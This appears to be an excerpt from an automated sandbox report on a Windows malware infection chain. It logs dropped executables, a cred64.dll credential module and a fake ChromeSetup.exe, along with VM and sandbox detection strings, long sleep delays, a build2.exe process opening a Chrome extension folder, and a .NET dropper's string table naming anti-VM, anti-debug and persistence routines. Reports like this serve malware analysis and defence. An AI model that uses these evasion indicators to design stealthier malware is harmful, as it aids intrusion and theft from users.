Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\D804.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\3C54.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\3C54.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\3C54.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\3C54.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\3C54.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\3C54.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\3C54.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\3C54.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\3C54.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\3C54.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\3C54.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\3C54.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\3C54.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\NewPlayer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\B46F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\B46F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\B46F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\B46F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\B46F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\B46F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\B46F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\B46F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\B46F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\B46F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\B46F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\B46F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\A170.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\A170.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\A170.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\A170.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\6d73a97b0c\mnolyk.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\913F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\5DA0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\5DA0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\5DA0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\5DA0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\5DA0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\5DA0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\5DA0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\5DA0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\5DA0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\5DA0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\5DA0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\5DA0.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\5DA0.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: 3C54.exe, 00000014.00000000.455817498.00000000004A2000.00000002.00000001.01000000.0000000C.sdmp	Binary or memory string: SBIEDLL.DLL/
Source: 01860199.exe, 00000000.00000002.379986606.000000000084A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ASWHOOK<

Checks if the current machine is a virtual machine (disk enumeration)

Source: C:\Users\user\Desktop\01860199.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\Desktop\01860199.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\Desktop\01860199.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\Desktop\01860199.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\Desktop\01860199.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\Desktop\01860199.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\hwgujdv	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\hwgujdv	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\hwgujdv	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\hwgujdv	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\hwgujdv	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\hwgujdv	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\F4F7.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\F4F7.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\F4F7.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\F4F7.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\F4F7.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\F4F7.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI

Source: C:\Windows\explorer.exe TID: 3492	Thread sleep time: -1020000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\D804.exe TID: 3728	Thread sleep time: -1200000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\3C54.exe TID: 4124	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\aafg31.exe TID: 6964	Thread sleep time: -300000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\6d73a97b0c\mnolyk.exe TID: 5232	Thread sleep time: -900000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\6d73a97b0c\mnolyk.exe TID: 6924	Thread sleep time: -50000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\6d73a97b0c\mnolyk.exe TID: 6948	Thread sleep time: -360000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\6d73a97b0c\mnolyk.exe TID: 6972	Thread sleep time: -1440000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\6d73a97b0c\mnolyk.exe TID: 6948	Thread sleep time: -180000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\6d73a97b0c\mnolyk.exe TID: 5232	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe TID: 6340	Thread sleep count: 129 > 30

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\aafg31.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\6d73a97b0c\mnolyk.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\6d73a97b0c\mnolyk.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\D804.exe	Thread delayed: delay time: 1200000
Source: C:\Users\user\AppData\Local\Temp\3C54.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\aafg31.exe	Thread delayed: delay time: 300000
Source: C:\Users\user\AppData\Local\Temp\6d73a97b0c\mnolyk.exe	Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\6d73a97b0c\mnolyk.exe	Thread delayed: delay time: 360000
Source: C:\Users\user\AppData\Local\Temp\6d73a97b0c\mnolyk.exe	Thread delayed: delay time: 180000

Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 417
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 756
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 766

Source: C:\Users\user\AppData\Local\Temp\D804.exe	Dropped PE file which has not been started: C:\Users\user\Downloads\ChromeSetup.exe.vapo (copy)
Source: C:\Users\user\AppData\Local\Temp\6d73a97b0c\mnolyk.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\07c6bc37dc5087\cred64.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\D804.exe	Dropped PE file which has not been started: C:\Users\user\Downloads\ChromeSetup.exe
Source: C:\Windows\explorer.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\3E02.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\57DC.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6d73a97b0c\mnolyk.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred64[1].dll	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\D804.exe

Code function: 5_2_024A671C rdtsc

Source: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build2.exe

Registry key enumerated: More than 150 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

Source: C:\Users\user\AppData\Local\Temp\D804.exe	Thread delayed: delay time: 1200000
Source: C:\Users\user\AppData\Local\Temp\3C54.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\aafg31.exe	Thread delayed: delay time: 300000
Source: C:\Users\user\AppData\Local\Temp\6d73a97b0c\mnolyk.exe	Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\6d73a97b0c\mnolyk.exe	Thread delayed: delay time: 50000
Source: C:\Users\user\AppData\Local\Temp\6d73a97b0c\mnolyk.exe	Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\6d73a97b0c\mnolyk.exe	Thread delayed: delay time: 360000
Source: C:\Users\user\AppData\Local\Temp\6d73a97b0c\mnolyk.exe	Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\6d73a97b0c\mnolyk.exe	Thread delayed: delay time: 30000

Source: C:\Users\user\AppData\Local\Temp\D804.exe

Source: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\

Source: aafg31.exe, 00000015.00000003.485059541.000001E290193000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 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
Source: D804.exe, 00000006.00000002.450438133.0000000000707000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWx
Source: D804.exe, 00000010.00000002.619429561.0000000000808000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW0
Source: D804.exe, 00000006.00000002.450438133.000000000075C000.00000004.00000020.00020000.00000000.sdmp, D804.exe, 00000006.00000003.445434280.000000000075C000.00000004.00000020.00020000.00000000.sdmp, D804.exe, 00000010.00000003.452471512.0000000000891000.00000004.00000020.00020000.00000000.sdmp, D804.exe, 00000010.00000002.619429561.0000000000891000.00000004.00000020.00020000.00000000.sdmp, D804.exe, 00000013.00000003.452681314.0000000000680000.00000004.00000020.00020000.00000000.sdmp, D804.exe, 00000013.00000002.619178225.0000000000680000.00000004.00000020.00020000.00000000.sdmp, D804.exe, 00000013.00000002.619178225.000000000062B000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.477923447.000001E29016F000.00000004.00001000.00020000.00000000.sdmp, aafg31.exe, 00000015.00000002.618169870.000001E2900FB000.00000004.00000001.00020000.00000000.sdmp, aafg31.exe, 00000015.00000002.618169870.000001E29016F000.00000004.00000001.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.489839300.000001E29016F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000001.00000000.369535854.00000000090D8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: 3C54.exe, 00000014.00000000.455817498.00000000004A2000.00000002.00000001.01000000.0000000C.sdmp	Binary or memory string: DetectVirtualMachine
Source: aafg31.exe, 00000015.00000003.477923447.000001E29016F000.00000004.00001000.00020000.00000000.sdmp, aafg31.exe, 00000015.00000002.618169870.000001E29016F000.00000004.00000001.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.489839300.000001E29016F000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.485848498.000001E29016F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWg
Source: 3C54.exe, 00000014.00000000.455817498.00000000004A2000.00000002.00000001.01000000.0000000C.sdmp	Binary or memory string: <Module>power.exeProgramStubWriterRunnerRunTimeAntiAntismscorlibSystemObjectdelaydelayTimeantiVMantiSandboxantiDebugantiEmulatorenablePersistenceenableFakeErrorencryptTypecompressedcversSystem.Collections.GenericList`1fileNamesfileTypesfileRunTypesfileDropPathsMainDecompressEncryptOrDecryptXORDecryptEncryptInitalizeIEnumerable`1EncryptOutputSwapGetResourceRunOnStartup.ctorWriteAllBytesExecuteDetectVirtualMachineGetModuleHandleDetectSandboxieCheckRemoteDebuggerPresentDetectDebuggerCheckEmulatordatatextkeysijfileregNameAppPathHidefileBytesfinalPathpathrunTypelpModuleNamehProcessisDebuggerPresentSystem.ReflectionAssemblyTitleAttributeAssemblyDescriptionAttributeAssemblyCompanyAttributeAssemblyProductAttributeAssemblyCopyrightAttributeAssemblyTrademarkAttributeAssemblyFileVersionAttributeAssemblyVersionAttributeSystem.Runtime.InteropServicesComVisibleAttributeGuidAttributeSystem.Runtime.CompilerServicesCompilationRelaxationsAttributeRuntimeCompatibilityAttributepowerEnvironmentExitSystem.ThreadingThreadSleepget_ItemStringop_EqualitySystem.TextEncodingget_UnicodeGetBytesConcatSystem.IOPathCombineget_CountMemoryStreamSystem.IO.CompressionDeflateStreamStreamCompressionModeCopyToIDisposableDisposeToArrayByteSystem.CoreSystem.LinqEnumerable<EncryptInitalize>b__0Func`2CS$<>9__CachedAnonymousMethodDelegate1CompilerGeneratedAttributeRangeSelect<>c__DisplayClass3<EncryptOutput>b__2bAssemblyGetExecutingAssemblySystem.ResourcesResourceManagerGetObjectAppDomainget_CurrentDomainget_FriendlyNameFileExistsGetEntryAssemblyget_Locationop_InequalityCopyFileAttributesGetAttributesSetAttributesMicrosoft.Win32RegistryRegistryKeyLocalMachineget_UTF8GetStringOpenSubKeySetValueCurrentUserException.cctorConvertFromBase64StringAddGetTempPathSystem.DiagnosticsProcessProcessStartInfoget_StartInfoset_FileNameStartSystem.ManagementManagementObjectSearcherManagementObjectCollectionGetManagementObjectEnumeratorGetEnumeratorManagementBaseObjectget_CurrentToStringToLowerToUpperInvariantContainsMoveNextDllImportAttributekernel32.dllIntPtrToInt32GetCurrentProcessget_HandleDateTimeget_Nowget_Ticksu3g1msyl5i1.resources
Source: explorer.exe, 00000001.00000000.369535854.00000000090D8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}i,
Source: D804.exe, 00000013.00000003.452681314.0000000000680000.00000004.00000020.00020000.00000000.sdmp, D804.exe, 00000013.00000002.619178225.0000000000680000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW,
Source: explorer.exe, 00000001.00000000.363366539.0000000005063000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}9'
Source: B46F.exe, 0000001A.00000002.489404633.0000000000687000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: D804.exe, 00000006.00000002.450883954.0000000002F30000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\d0-
Source: B46F.exe, 0000001A.00000002.489404633.0000000000687000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWX
Source: explorer.exe, 00000001.00000000.369535854.00000000090D8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}z,
Source: B46F.exe, 0000001A.00000003.479306227.0000000000711000.00000004.00000020.00020000.00000000.sdmp, B46F.exe, 0000001A.00000002.489404633.0000000000711000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW2.3 MAC Layer LightWeight Filter-0000
Source: D804.exe, 00000006.00000002.450883954.0000000002F30000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \Registry\Machine\Software\Classes\Interface\{AF86E2E0-B12D-4C6A-9C5A-D7AA65101E90}\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: 3C54.exe, 00000014.00000000.455817498.00000000004A2000.00000002.00000001.01000000.0000000C.sdmp	Binary or memory string: vmware
Source: explorer.exe, 00000001.00000000.366426205.0000000007166000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
Source: explorer.exe, 00000001.00000000.369535854.0000000008FD3000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&0000001 ZG
Source: D804.exe, 00000013.00000002.636070288.0000000003214000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: }\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: B46F.exe, 0000001A.00000002.489404633.0000000000739000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: r100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}<
Source: 913F.exe, 00000025.00000002.514716181.0000000000667000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW@
Source: explorer.exe, 00000001.00000000.369535854.00000000090D8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: 